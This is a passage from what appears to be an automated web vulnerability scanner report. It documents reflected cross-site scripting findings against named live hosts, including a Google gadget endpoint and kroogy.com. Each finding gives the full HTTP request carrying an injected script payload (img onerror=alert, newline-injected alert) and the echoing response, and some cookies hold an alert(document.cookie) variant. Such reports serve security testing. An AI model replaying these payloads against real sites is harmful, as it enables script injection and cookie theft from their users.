udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUP15EmBCXIQf7vINOF29xhxI62Gqq5Pz6kTdW4IyZSiOS+M2YJOcz6q2P9sDss6IiOOAna934wAc1OgIXBRULbReTd/TTESP88S9pLK3oAItpLuMcMgoTm0h6IpYQTKFo4eKZKfVP4DI2GWJcAu5ujdBimvPRyOYkfGIJvUFa6jA6yQrFCwxAs8iE7tcr9s9LEIU0F0cZ2Gw1ZuZ0vo2293i3r/YJI8GOnAt6FcCXMlGmkAAnDfh2ygNQxm4uvdbJqkyTTiG353WvQ0osdDpEm117TJhQ19ZMdPbK9EHDnbZmla+9IJlGt//C+/ACkLoMgk2iXGHiQ+LLtHn7wXgGsArQcUS1fZ5ZGRCQFqL709COVOlvAf7n3WlJsMl5NHQsaZqGyY6DQWFd0d9NTVSkXA72XqWDfEbNyLSB6z478TRZ0qpNPGuBVgyiHzBvN5mYV9Y7TRh7nyhF/3QDS2pD71/OzDvi34bWAxsKvLc2g0YatDQ5iiFS3lqfSKCVDk3AW6; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rtc_JXtz=MLsXtzE1ZxpnJ5GrHvmWF/KWrPo31Agpb5slCPedGNAwVTi74gkGz+Ioj4EWp+/DHqged2X1aG4UUDn9Sek+jWM8PzolTSqS7RsUjlJjpOBJV4OQhg8QGT4qzmd32wLpi/idGBjih+awrUoKWaJ0K1B1Lomb0QkvRD26c4T9RWug2cO4FjzKAUk/0qUcoDTyVussQkDgGXRawu/DgYy8AQYowPQYovmciLKxDbxy63oR0tY9ui/NiCYn/cnzTG4mUrhXRSpVst8UQQg9UDg0tgeixM8uBejqsKnVnMHc9P9FTM7x/ggwgrQzGUjVo6BefFXgFaQMIq+AXZcR/zpqBBsaLusDfUMdaCoeRbtAAVUE2mPvTEZu/93IB+zgKsSSVbDbVKROB1dqyeuXojAa7aHmb6eu+5ZmujQ0hRHn3xtEalcmuMeIg3WRnEijYtYALyQhp73E6VAmilQtoTPiNnBpnYBOsQoPgwgptLgSn07OG+jh5lrW7RTgIKy6MXkkmkQhCWZXO5mYNKzaRPm5xTNWXdC2579VbAg5n3aFD4xHuBpLc1V4ElYMePMZdeAdlgtT0E6Bx+Nlet6sPh5w2kN9EGCAsoXpjef+SbJ6yj1XtqK/Ti4AW2t0WrjxZ+ZdhqeYyX2/xogbUb/mgHumrix8fG9wK1NOIuNbpYW55sLR+aqooY9f7I2Zb0/Y4FhxjSKXWeh8Wap9wk65kZYLh9kAq0vrvz5Qi9Q/ZEgsrAd+fuTGh+Rs0UYPCj/jKhV2sOX+dhl0rauwPPPDupVHqmA11y8OaIDcpDa40Ec+aQmnD1Fg27ft7srSL4do5uyHD6m6pzT5gt/lh1IEBu7j624K+xXaxFrGmoe9um+HHVewxEiqK1yBPju68o7c4sEE6uv1R7tqhcphC80uE6bJsLcvZGgmVNLQoRmZu+19T6S/xFwIm0CESwJweNmTY93I8wQWuSkfvZPw3CXLkLuMOgDCuaebRsxiEO6Ve6CksLxbQx9Y5wo/Y6ljLXS6W8TuXPg8Ajn5DU+Gi7u6DUWdBc3GEgPZ4yACxIzv1Ht2Sa9lB0jhrHo/7Az8dBX7jueoWaMLanZ233NKdMdp+CJe8rutyK9A4GiO/JUhmI9K6dIDyOLSc4CAUt8mYfqlj3OYYg5jHXX8T05v6nQrJDyj95cvG4Z4jCeVWfvZ67L9q8UCKCd8w/lnvZvmyZKJJHPmUsWaIp/R8cDID5iXMFfc7AjdPWSXxeIYwJg9CwbkPsH6kXw8r0Oqf+XkEFay3UyruKRLC/1ue7DUS06B9fKLJFdj1f9LkA1cTpsnTLax8shJVlffoxUmGUzIDD92ECFG+DvSakohNl+OCiyZe+o3RcTToFAQ07UwbeMPaqA3lvSgwmqNpCpclQXSYtB1HznkXyZTA53rtFtSU+gRUvyL7AbO5Nev/zyDtnqcR5ujoU8PPUHYK7LfI3Ikvsuf5Q1AXNSohTIoIOj09vCTD62+I86CBu6sVVo=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 07 May 2011 22:38:28 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 08 May 2011 22:38:28 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 07 May 2011 22:38:28 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "I109856DEA5<SCRIPT>ALERT(1)</SCRIPT>3BB340FDD25" was not recognized.
*/

5.67. http://k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 9f349%0aalert(1)//0354955d84e was submitted in the url parameter. This input was echoed as 9f349
alert(1)//0354955d84e
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/newsletterSubscribe.xml9f349%0aalert(1)//0354955d84e&container=peoplesense&parent=http://allatsea.net/&mid=0&view=profile&d=0.558.7&lang=en&up_newsletterHeadlineText=Subscribe+to+All+At+Sea!&up_newsletterStandardText=Get+updates+of+our+latest+content&communityId=14672211859858017590&caller=http://allatsea.net/subscribe.htm HTTP/1.1
Host: k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 21:13:20 GMT
Expires: Fri, 06 May 2011 21:13:20 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 138

Unable to retrieve spec for http://www.google.com/friendconnect/gadgets/newsletterSubscribe.xml9f349
alert(1)//0354955d84e
. HTTP error 400

5.68. http://kroogy.com/a [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /a

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f643<img%20src%3da%20onerror%3dalert(1)>45b677da56a was submitted in the REST URL parameter 1. This input was echoed as 7f643<img src=a onerror=alert(1)>45b677da56a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /a7f643<img%20src%3da%20onerror%3dalert(1)>45b677da56a HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/favicon.ico627d6%3Cimg%20src%3da%20onerror%3dalert(1)%3E13232c83b32
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=129279958.1304823358.2.2.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/Linkbucks%20vlad%20modelS; __utma=129279958.1180364951.1304737441.1304737441.1304823358.2; __utmc=129279958; __utmb=129279958.4.10.1304823358

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:56:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2124

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>A7f643<img src=a onerror=alert(1)>45b677da56aController</strong>
...[SNIP]...

5.69. http://kroogy.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 627d6<img%20src%3da%20onerror%3dalert(1)>13232c83b32 was submitted in the REST URL parameter 1. This input was echoed as 627d6<img src=a onerror=alert(1)>13232c83b32 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.ico627d6<img%20src%3da%20onerror%3dalert(1)>13232c83b32 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=129279958.1304737441.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129279958.1180364951.1304737441.1304737441.1304737441.1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:55:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2134

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Favicon.ico627d6<img src=a onerror=alert(1)>13232c83b32Controller</strong>
...[SNIP]...

5.70. http://kroogy.com/pub/banner_160_600.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /pub/banner_160_600.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3e0ed<img%20src%3da%20onerror%3dalert(1)>c7f680ee50 was submitted in the REST URL parameter 1. This input was echoed as 3e0ed<img src=a onerror=alert(1)>c7f680ee50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pub3e0ed<img%20src%3da%20onerror%3dalert(1)>c7f680ee50/banner_160_600.php HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web/Linkbucks%20vlad%20modelS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303658380.1303738749.6

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:04:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2125

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Pub3e0ed<img src=a onerror=alert(1)>c7f680ee50Controller</strong>
...[SNIP]...

5.71. http://kroogy.com/pub/banner_728_90.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /pub/banner_728_90.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload baf1c<img%20src%3da%20onerror%3dalert(1)>950c584fd97 was submitted in the REST URL parameter 1. This input was echoed as baf1c<img src=a onerror=alert(1)>950c584fd97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pubbaf1c<img%20src%3da%20onerror%3dalert(1)>950c584fd97/banner_728_90.php HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://ads.adonion.com/serving/showbanner.php?zone_id=45274&user_id=17557&site_id=15418&size_id=1&type_id=2&flag=12&b1=%239cbce8&b2=%23000000&b3=%23FFFFFF&b4=%23000000&ref=http%3A%2F%2Fwww.kroogy.com%2Fsearch%2Famazon%3Fsearch%3Dmp3%26type%3DAmazon%26fl%3D0&token=ZGs2zNQg0yIgLSzR0vklWi0pMM7PIdh8fSoqz88i03z5alom3iHRIg&random=2580
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=129279958.1304823358.2.2.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/Linkbucks%20vlad%20modelS; __utma=129279958.1180364951.1304737441.1304737441.1304823358.2; __utmc=129279958; __utmb=129279958.2.10.1304823358

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:56:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2126

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Pubbaf1c<img src=a onerror=alert(1)>950c584fd97Controller</strong>
...[SNIP]...

5.72. http://kroogy.com/pub/banner_728_90_random.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /pub/banner_728_90_random.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 15bf1<img%20src%3da%20onerror%3dalert(1)>c26cf5636dc was submitted in the REST URL parameter 1. This input was echoed as 15bf1<img src=a onerror=alert(1)>c26cf5636dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pub15bf1<img%20src%3da%20onerror%3dalert(1)>c26cf5636dc/banner_728_90_random.php HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: kroogy.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:03:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2126

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Pub15bf1<img src=a onerror=alert(1)>c26cf5636dcController</strong>
...[SNIP]...

5.73. http://kroogy.com/pub15bf1%3Cimg%20src%3da%20onerror%3dalert(1)%3Ec26cf5636dc/a [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /pub15bf1%3Cimg%20src%3da%20onerror%3dalert(1)%3Ec26cf5636dc/a

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a3cd5<img%20src%3da%20onerror%3dalert(1)>368457392a4 was submitted in the REST URL parameter 1. This input was echoed as a3cd5<img src=a onerror=alert(1)>368457392a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pub15bf1%3Cimg%20src%3da%20onerror%3dalert(1)%3Ec26cf5636dca3cd5<img%20src%3da%20onerror%3dalert(1)>368457392a4/a HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/pub15bf1%3Cimg%20src%3da%20onerror%3dalert(1)%3Ec26cf5636dc/banner_728_90_random.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=129279958.1304823358.2.2.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/Linkbucks%20vlad%20modelS; __utma=129279958.1180364951.1304737441.1304737441.1304823358.2; __utmc=129279958; __utmb=129279958.2.10.1304823358

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:56:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2170

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<img src=a onerror=alert(1)>c26cf5636dca3cd5<img src=a onerror=alert(1)>368457392a4Controller</strong>
...[SNIP]...

5.74. http://kroogy.com/search/web/Linkbucks%20vlad%20modelS [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web/Linkbucks%20vlad%20modelS

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c3d36<img%20src%3da%20onerror%3dalert(1)>1f123855a7 was submitted in the REST URL parameter 1. This input was echoed as c3d36<img src=a onerror=alert(1)>1f123855a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /searchc3d36<img%20src%3da%20onerror%3dalert(1)>1f123855a7/web/Linkbucks%20vlad%20modelS HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303658380.1303738749.6

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:07:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2128

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Searchc3d36<img src=a onerror=alert(1)>1f123855a7Controller</strong>
...[SNIP]...

5.75. http://kroogy.com/search/web/Linkbucks%20vlad%20modelS [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web/Linkbucks%20vlad%20modelS

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 19465<img%20src%3da%20onerror%3dalert(1)>7fccbdccd2f was submitted in the REST URL parameter 2. This input was echoed as 19465<img src=a onerror=alert(1)>7fccbdccd2f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/web19465<img%20src%3da%20onerror%3dalert(1)>7fccbdccd2f/Linkbucks%20vlad%20modelS HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303658380.1303738749.6

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:07:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2117

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>web19465<img src=a onerror=alert(1)>7fccbdccd2f</strong>
...[SNIP]...

5.76. http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(1)%3E7fccbdccd2f/a [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web19465%3Cimg%20src%3da%20onerror%3dalert(1)%3E7fccbdccd2f/a

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dcdb5<img%20src%3da%20onerror%3dalert(1)>4005840d3e2 was submitted in the REST URL parameter 1. This input was echoed as dcdb5<img src=a onerror=alert(1)>4005840d3e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /searchdcdb5<img%20src%3da%20onerror%3dalert(1)>4005840d3e2/web19465%3Cimg%20src%3da%20onerror%3dalert(1)%3E7fccbdccd2f/a HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(1)%3E7fccbdccd2f/Linkbucks%20vlad%20modelS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=129279958.1304823358.2.2.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/Linkbucks%20vlad%20modelS; __utma=129279958.1180364951.1304737441.1304737441.1304823358.2; __utmc=129279958; __utmb=129279958.3.10.1304823358

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:56:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Searchdcdb5<img src=a onerror=alert(1)>4005840d3e2Controller</strong>
...[SNIP]...

5.77. http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(1)%3E7fccbdccd2f/a [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web19465%3Cimg%20src%3da%20onerror%3dalert(1)%3E7fccbdccd2f/a

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 35e2f<img%20src%3da%20onerror%3dalert(1)>68babb1224f was submitted in the REST URL parameter 2. This input was echoed as 35e2f<img src=a onerror=alert(1)>68babb1224f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

